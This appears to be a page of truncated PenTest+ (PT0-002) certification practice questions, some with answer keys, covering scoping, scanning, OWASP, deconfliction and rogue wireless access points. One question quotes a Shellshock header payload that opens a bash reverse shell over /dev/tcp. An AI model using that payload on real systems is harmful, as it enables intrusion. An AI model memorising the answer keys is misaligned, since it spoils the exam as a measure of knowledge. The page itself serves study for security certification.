PT0-002 exam

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?A . The IP address is wrong. B. The server is unreachable. C. The IP address is on the blocklist. D. The IP address is on the allow list.View AnswerAnswer: B Explanation:...

A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?A . Patch installations B....

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the...

Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?A . SOW B. SLA C. MSA D. NDAView AnswerAnswer: A

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...

Which of the following BEST describe the OWASP Top 10? (Choose two.)A . The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F....

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration...

Deconfliction is necessary when the penetration test:A . determines that proprietary information is being stored in cleartext. B. occurs during the monthly vulnerability scanning. C. uncovers indicators of prior compromise over the course of the assessment. D. proceeds in parallel with a criminal digital forensic investigation.View AnswerAnswer: D Explanation: Deconfliction...

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps...

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of...